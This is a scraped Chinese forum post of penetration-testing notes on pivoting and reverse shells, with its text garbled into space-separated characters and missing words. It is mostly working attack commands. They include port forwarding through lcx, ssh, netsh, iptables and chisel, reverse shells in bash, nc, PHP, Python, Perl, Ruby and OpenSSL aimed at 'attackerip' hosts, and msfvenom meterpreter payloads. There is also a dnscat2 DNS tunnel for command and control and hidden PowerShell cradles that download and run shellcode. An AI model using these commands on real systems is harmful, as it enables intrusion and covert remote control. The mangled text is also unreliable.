[22061] 2021-06-12_渗透测试常规操作记录(中)

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-06-12_渗透测试常规操作记录(中)   L e m o n S e c   2 0 2 1 - 0 6 - 1 2 1 3 D D O S - - & M S F l c x . e x e S S H 使 i p > p o r t f w d   a d d   - l   5 5 5 5   - p   3 3 8 9   - r   1 7 2 . 1 6 . 8 6 . 1 5 3 3 3 8 9 5 5 5 5 > p o r t f w d   l i s t 使 i p l c x . e x e   - s l a v e   I P   9 9 9 9   1 2 7 . 0 . 0 . 1   3 3 8 9 l i n u x . / p o r t m a p   - m   2   - p 1   9 9 9 9   - p 2   3 3 8 8 9 w i n d o w s l c x   - l i s t e n   9 9 9 9   3 3 8 8 9   9 9 9 9 3 3 8 8 9 P o r t T r a n h t t p s : / / g i t h u b . c o m / k 8 g e g e / K 8 t o o l s / r a w / m a s t e r / P o r t T r a n . r a r > P o r t T r a n S 2 0 . e x e   1 2 3 4 5   3 8 9 > P o r t T r a n C 2 0 . e x e   1 2 7 . 0 . 0 . 1   3 3 8 9   1 9 2 . 1 6 8 . 0 . 1 0 2   1 2 3 4 5 3 8 9 - C   - f   - N   s h e l l   - n   - q   d e b u g - l   s s h - g   - L   - R   - D   s o c k s - T   - p   s s h
I n v o k e - S o c k s P r o x y 1 1 0 1 1 5 r e s t a r t   s s h # v i m   / e t c / s s h / s s h d _ c o n f A l l o w T c p F o r w a r d i n g   y e s   T C P G a t e w a y P o r t s   y e s       T C P K e e p A l i v e   y e s         T C P P a s s w o r d A u t h e n t i c a t i o n   y e s     > s s h   - C   - f   - N   - g   - L   3 3 8 9 0 : 1 9 2 . 1 6 8 . 0 . 1 1 5 : 3 3 8 9   r o o t @ 1 9 2 . 1 6 8 . 0 . 1 1 0   - p   2 2 3 3 8 9 0 3 3 8 9 线 M S F L i n u x - - L i n u x - - w i n > m s f v e n o m   - p   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = L i n u x   l p o r t = 1 2 1 3 8   - f   e x e   - o   / v a r / w w w / h t m l / 1 . e x e 1 2 3 4 5 L i n u x > s s h   - C   - f   - N   - g   - L   0 . 0 . 0 . 0 : 1 2 1 3 8 : : 1 2 3 4 5   r o o t @ L i n u x   - p   2 2 1 0 7 9 7 r e s t a r t   s s h # v i m   / e t c / s s h / s s h d _ c o n f A l l o w T c p F o r w a r d i n g   y e s   T C P G a t e w a y P o r t s   y e s       T C P K e e p A l i v e   y e s         T C P P a s s w o r d A u t h e n t i c a t i o n   y e s     > s s h   - C   - f   - N   - g   - R   3 3 8 9 0 : 1 0 . 1 . 1 . 9 7 : 3 3 8 9   r o o t @ 1 9 2 . 1 6 8 . 0 . 1 0 7   - p   2 2 3 3 8 9 0 3 3 8 9 > n e t s t a t   t n l p a p t   i n s t a l l   r i n e t d ( t c p ) > v i m   / e t c / r i n e t d . c o n f 0 . 0 . 0 . 0   3 3 8 9   1 2 7 . 0 . 0 . 1   3 3 8 9 0 > s e r v i c e   r i n e t d   s t a r t 1 0 7 k a l i 1 0 7 : 3 3 8 9 0 1 0 . 1 . 1 . 9 7 h t t p s : / / g i t e e . c o m / R i c h C h i g g a / I n v o k e - S o c k s P r o x y > I m p o r t - M o d u l e   . I n v o k e - S o c k s P r o x y . p s m 1 > I n v o k e - S o c k s P r o x y   - b i n d P o r t   1 2 1 3 8   s o c k s 使
S S F h t t p s : / / g i t h u b . c o m / s e c u r e s o c k e t f u n n e l i n g / s s f / r e l e a s e s > s s f d . e x e   - p   1 0 8 0 > s s f . e x e   - L   1 2 1 3 8 : 1 0 . 1 . 1 . 1 0 8 : 2 2   - p   1 0 8 0   1 9 2 . 1 6 8 . 0 . 9 8 1 0 . 1 . 1 . 1 0 8 S S H 访 > s s f d . e x e   - p   1 0 8 0
N e t s h I p t a b l e s > s s f . e x e   - R   1 2 1 3 8 : 1 0 . 1 . 1 . 1 0 8 : 2 2   - p   1 0 8 0   1 9 2 . 1 6 8 . 0 . 1 0 6 > n e t s h   i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n a d d r e s s = 1 9 2 . 1 6 8 . 0 . 9 8   l i s t e n p o r t = 2 2 2 2   c o n n e c t a d d r e s s = 1 0 . 1 . 1 . 1 0 8   c o n n e c t p o r t = 2 2 1 0 . 1 . 1 . 1 0 8 2 2 2 2 2 2 2 2 2 2 访 S S H > n e t s h   i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n a d d r e s s = 1 9 2 . 1 6 8 . 0 . 9 8   l i s t e n p o r t = 1 3 3 8 9   c o n n e c t a d d r e s s = 1 9 2 . 1 6 8 . 0 . 9 8   c o n n e c t p o r t = 3 3 8 9 访 > n e t s h   a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = " R D P "   p r o t o c o l = T C P   d i r = i n   l o c a l i p = 1 9 2 . 1 6 8 . 0 . 9 8   l o c a l p o r t = 1 3 3 8 9   a c t i o n = a l l o w : > n e t s h   i n t e r f a c e   p o r t p r o x y   s h o w   a l l > n e t s h   i n t e r f a c e   p o r t p r o x y   d e l e t e   v 4 t o v 4   l i s t e n p o r t = 1 3 3 8 9   l i s t e n a d d r e s s = 1 9 2 . 1 6 8 . 0 . 9 8 > n e t s h   i n t e r f a c e   p o r t p r o x y   r e s e t i p > v i m   / e t c / s y s c t l . c o n f n e t . i p v 4 . i p _ f o r w a r d = 1
c h i s e l & I n t e r a c t i v e   s h e l l 2 2 2 2 2 2 > i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - p   t c p   - - d p o r t   2 2 2 2   - j   R E D I R E C T   - - t o - p o r t s   2 2 9 8 3 3 8 9 1 1 0 6 7 8 9 > i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - d   1 9 2 . 1 6 8 . 0 . 1 1 0   - p   t c p   - - d p o r t   6 7 8 9   - j   D N A T   - - t o - d e s t i n a t i o n   1 9 2 . 1 6 8 . 0 . 9 8 : 3 3 8 9 > i p t a b l e s   - t   n a t   - A   P O S T R O U T I N G   - d   1 9 2 . 1 6 8 . 0 . 9 8   - p   t c p   - - d p o r t   3 3 8 9   - j   S N A T   - - t o   1 9 2 . 1 6 8 . 0 . 1 1 0 > i p t a b l e s   - t   n a t   - L > i p t a b l e s   - t   n a t   - D   P R E R O U T I N G   1 > i p t a b l e s   - t   n a t   F h t t p s : / / g i t h u b . c o m / j p i l l o r a / c h i s e l > c h i s e l   s e r v e r   - p   1 2 1 3 8   r e v e r s e > c h i s e l   c l i e n t   I P : 1 2 1 3 8   R : 1 2 3 4 : 1 2 7 . 0 . 0 . 1 : 3 3 8 9 1 2 3 4 访 3 3 8 9 > p y t h o n   - c   ' i m p o r t   p t y ; p t y . s p a w n ( " / b i n / b a s h " ) ' > e x p e c t   - c   ' s p a w n   b a s h ; i n t e r a c t '
b a s h n c t e l n e t p h p p y t h o n p e r l > / b i n / b a s h   - i   >   / d e v / t c p / a t t a c k e r i p / 4 4 4 4   0 < & 1   2 > & 1 > b a s h   - i   > &   / d e v / t c p / a t t a c k e r i p / 4 4 4 4   0 > & 1 > 0 < & 1 9 6 ; e x e c   1 9 6 < > / d e v / t c p / a t t a c k e r i p / 4 4 4 4 ;   s h   < & 1 9 6   > & 1 9 6   2 > & 1 9 6 > m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ b a s h   L H O S T = a t t a c k e r i p   L P O R T = 4 4 4 4   - o   s h e l l . s h > n c   - e   / b i n / s h   a t t a c k e r i p   4 4 4 4 > n c   - L p   3 1 3 3 7   - v v   - e   c m d . e x e & > m k n o d   b a c k p i p e   p ;   n c   1 9 2 . 1 6 8 . 0 . 1 0 7   1 2 1 3 8   0 < b a c k p i p e   |   / b i n / b a s h   1 > b a c k p i p e > n c   1 9 2 . 1 6 8 . 0 . 1 0   3 1 3 3 7 > m k n o d   b a c k p i p e   p ;   t e l n e t   a t t a c k e r i p   4 4 3   0 < b a c k p i p e   |   / b i n / b a s h   1 > b a c k p i p e # p h p   - r   ' $ s o c k = f s o c k o p e n ( " I P " , p o r t ) ; e x e c ( " / b i n / s h   - i   < & 3   > & 3   2 > & 3 " ) ; ' < ? p h p   e x e c ( " / b i n / b a s h   - c   ' b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 0 . 1 0 7 / 1 2 3 4   0 > & 1 ' " ) ; ? > > p y t h o n   - c   '   i m p o r t   s o c k e t , s u b p r o c e s s , o s ; s = s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T , s o c k e t . S O C K _ S T R E A M ) ; s . c o n n e c t ( ( " I P " , 4 4 4 4 ) ) ; o s . d u p 2 ( s . f i l e n o ( ) , 0 ) ; o s . d u p 2 ( s . f i l e n o ( ) , 1 ) ; o s . d u p 2 ( s . f i l e n o ( ) , 2 ) ;   p = s u b p r o c e s s . c a l l ( [ " / b i n / b a s h " , " - i " ] ) ;   ' > m s f v e n o m   - p   c m d / u n i x / r e v e r s e _ p y t h o n   L H O S T = 1 2 7 . 0 . 0 . 1   L P O R T = 4 4 3   - o   s h e l l . p y > i m p o r t   s o c k e t , s t r u c t , t i m e   f o r   x   i n   r a n g e ( 1 0 ) :   t r y :   s = s o c k e t . s o c k e t ( 2 , s o c k e t . S O C K _ S T R E A M )   s . c o n n e c t ( ( ' I P ' , ) )   b r e a k   e x c e p t :   t i m e . s l e e p ( 5 )   l = s t r u c t . u n p a c k ( ' > I ' , s . r e c v ( 4 ) ) [ 0 ]   d = s . r e c v ( l )   w h i l e   l e n ( d )
r u b y O p e n S S L   e n c r y p t   s h e l l L i n u x 使 T L S 1 . 2   W i n d o w s > p e r l   - e   ' u s e   S o c k e t ; $ i = "   a t t a c k e r i p   " ; $ p = 4 4 4 4 ; s o c k e t ( S , P F _ I N E T , S O C K _ S T R E A M , g e t p r o t o b y n a m e ( " t c p " ) ) ; i f ( c o n n e c t ( S , s o c k a d d r _ i n ( $ p , i n e t _ a t o n ( $ i ) ) ) ) { o p e n ( S T D I N , " > & S " ) ; o p e n ( S T D O U T , " > & S " ) ; o p e n ( S T D E R R , " > & S " ) ; e x e c ( " / b i n / s h   - i " ) ; } ; ' > p e r l   - M I O   - e   ' $ p = f o r k ; e x i t , i f ( $ p ) ; $ c = n e w   I O : : S o c k e t : : I N E T ( P e e r A d d r , " a t t a c k e r i p : 4 4 4 4 " ) ; S T D I N - > f d o p e n ( $ c , r ) ; $ ~ - > f d o p e n ( $ c , w ) ; s y s t e m $ _   w h i l e < > ; ' > p e r l   - M I O   - e   ' $ c = n e w   I O : : S o c k e t : : I N E T ( P e e r A d d r , " a t t a c k e r i p : 4 4 4 4 " ) ; S T D I N - > f d o p e n ( $ c , r ) ; $ ~ - > f d o p e n ( $ c , w ) ; s y s t e m $ _   w h i l e < > ; '     # # # # # w i n d o w s > r u b y   - r s o c k e t   - e ' f = T C P S o c k e t . o p e n ( " a t t a c k e r i p   " , 4 4 4 4 ) . t o _ i ; e x e c   s p r i n t f ( " / b i n / s h   - i   < & % d   > & % d   2 > & % d " , f , f , f ) ' > r u b y   - r s o c k e t   - e   ' c = T C P S o c k e t . n e w ( " a t t a c k e r i p " , " 4 4 4 4 " ) ; w h i l e ( c m d = c . g e t s ) ; I O . p o p e n ( c m d , " r " ) { | i o | c . p r i n t   i o . r e a d } e n d '       # # # # # w i n d o w s > o p e n s s l   r e q   - x 5 0 9   - n e w k e y   r s a : 2 0 4 8   - k e y o u t   k e y . p e m   - o u t   c e r t . p e m   - d a y s   3 6 5   - n o d e s > o p e n s s l   s _ s e r v e r   - q u i e t   - k e y   k e y . p e m   - c e r t   c e r t . p e m   - p o r t   1 3 3 7 > m k f i f o   / t m p / s ;   / b i n / s h   - i   <   / t m p / s   2 > & 1   |   o p e n s s l   s _ c l i e n t   - q u i e t   - c o n n e c t   1 9 2 . 1 6 8 . 0 . 1 0 8 : 1 3 3 7   >   / t m p / s ;   r m   / t m p / s 2 > o p e n s s l   s _ s e r v e r   - q u i e t   - k e y   k e y . p e m   - c e r t   c e r t . p e m   - p o r t   1 3 3 7 > o p e n s s l   s _ s e r v e r   - q u i e t   - k e y   k e y . p e m   - c e r t   c e r t . p e m   - p o r t   1 3 3 8 > o p e n s s l   s _ c l i e n t   - q u i e t   - c o n n e c t   1 9 2 . 1 6 8 . 0 . 1 0 8 : 1 3 3 7 | c m d . e x e | o p e n s s l   s _ c l i e n t   - q u i e t   - c o n n e c t   1 9 2 . 1 6 8 . 0 . 1 0 8 : 1 3 3 8
D n s c a t 2 P o w e r c a t D n s c a t 2   e x e d n s c a t 2 > a p t - g e t   - y   i n s t a l l   r u b y - d e v   g i t   m a k e   g + + > g e m   i n s t a l l   b u n d l e r > g i t   c l o n e   h t t p s : / / g i t h u b . c o m / i a g o x 8 6 / d n s c a t 2 . g i t > c d   d n s c a t 2 / s e r v e r > b u n d l e   i n s t a l l > r u b y   d n s c a t 2 . r b   a b c . c o m   - e   o p e n   - - n o - c a c h e > p o w e r c a t   - c   1 9 2 . 1 6 8 . 0 . 1 0 8   - v   - d n s   a b c . c o m   - e   c m d . e x e d n s c a t 2 > s e s s i o n   - i   1 L i n u x h t t p s : / / d o w n l o a d s . s k u l l s e c u r i t y . o r g / d n s c a t 2 / d n s c a t 2 - v 0 . 0 7 - c l i e n t - x 8 6 . t a r . b z 2   h t t p s : / / d o w n l o a d s . s k u l l s e c u r i t y . o r g / d n s c a t 2 / d n s c a t 2 - v 0 . 0 7 - c l i e n t - x 6 4 . t a r . b z 2 h t t p s : / / d o w n l o a d s . s k u l l s e c u r i t y . o r g / d n s c a t 2 / d n s c a t 2 - v 0 . 0 7 - c l i e n t - w i n 3 2 . z i p
D N S   T X T   C o m m a n d y 0 s t U S g t T i 3 i 5 Q I A > r u b y   d n s c a t 2 . r b   - - d n s   " d o m a i n = z o n e . c o m , h o s t = 1 9 2 . 1 6 8 . 0 . 1 0 8 "   - - n o - c a c h e > d n s c a t 2 - v 0 . 0 7 - c l i e n t - w i n 3 2 . e x e   - - d n s   s e r v e r = 1 9 2 . 1 6 8 . 0 . 1 0 8 > s e s s i o n   - i   [ I D ] h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g / U t i l i t y / O u t - D n s T x t . p s 1 h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g / B a c k d o o r s / D N S _ T X T _ P w n a g e . p s 1 p s h 使 o u t - d n s t x t n e t   u s e r t x t t x t
P o w e r s h e l l M S F + P o w e r s h e l l P o w e r c a t > I m p o r t - M o d u l e   . D N S _ T X T _ P w n a g e . p s 1 > D N S _ T X T _ P w n a g e   - s t a r t d o m a i n   s t a r t . z o n e . c o m   - c m d s t r i n g   c m d   - c o m m a n d d o m a i n   1 . z o n e . c o m   - p s s t r i n g   s t a r t   - p s d o m a i n   z o n e . c o m   - S u b d o m a i n s   1   - S t o p S t r i n g   s t o p M S F M S F P S   > I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 0 / p o w e r s p l o i t / C o d e E x e c u t i o n / I n v o k e - S h e l l c o d e . p s 1 ' )   P S   > I n v o k e - S h e l l c o d e   - p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ h t t p   - l h o s t   1 9 2 . 1 6 8 . 0 . 1 0 0   - l p o r t   6 6 6 6   - f o r c e > u s e   e x p l o i t / m u l t i / h a n d l e r > s e t   p a y l o a d   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _   h t t p s > r u n > m s f v e n o m   - p   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ h t t p s   L H O S T = 1 9 2 . 1 6 8 . 0 . 1 0 0   L P O R T = 4 4 4 4   - f   p o w e r s h e l l   - o   / v a r / w w w / h t m l / p s > I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 0 / p o w e r s p l o i t / C o d e E x e c u t i o n / I n v o k e - S h e l l c o d e . p s 1 " ) > I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 0 / p s " ) > I n v o k e - S h e l l c o d e   - S h e l l c o d e   ( $ b u f ) > m s f v e n o m   - p   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 9 2 . 1 6 8 . 0 . 1 0 0   L P O R T = 4 4 4 4   - f   p s h - r e f l e c t i o n   > / v a r / w w w / h t m l / a . p s 1 > p o w e r s h e l l   - n o p   - w   h i d d e n   - c   " I E X ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 1 / a . p s 1 ' ) " > p o w e r s h e l l   I E X   ( N e w - O b j e c t   S y s t e m . N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / b e s i m o r h i n o / p o w e r c a t / m a s t e r / p o w e r c a t . p s 1 ' ) : p o w e r c a t   - l   - p   8 0 8 0   - e   c m d . e x e   v : n c   1 9 2 . 1 6 8 . 0 . 1   8 0 8 0   v v n c   l   p   8 0 8 0   v v : p o w e r c a t   c   1 9 2 . 1 6 8 . 0 . 1   p   8 0 8 0   v   e   c m d . e x e > p o w e r s h e l l   - n o p   - w   h i d d e n   - e p   b y p a s s   " I E X   ( N e w - O b j e c t   S y s t e m . N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 0 7 / p s / p o w e r c a t / p o w e r c a t . p s 1 ' ) ;   p o w e r c a t   - c   1 9 2 . 1 6 8 . 0 . 1 0 7   - p   1 2 3 4 5   - v   - e   c m d . e x e " : p o w e r c a t   - l   - p   8 0 8 0   - e   c m d . e x e   - v : n c   1 9 2 . 1 6 8 . 0 . 1   8 0 8 0   - v v n c   - l   - p   8 0 8 0   - v v : p o w e r c a t   - c   1 9 2 . 1 6 8 . 0 . 1   - p   8 0 8 0   - v   - e   c m d . e x e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则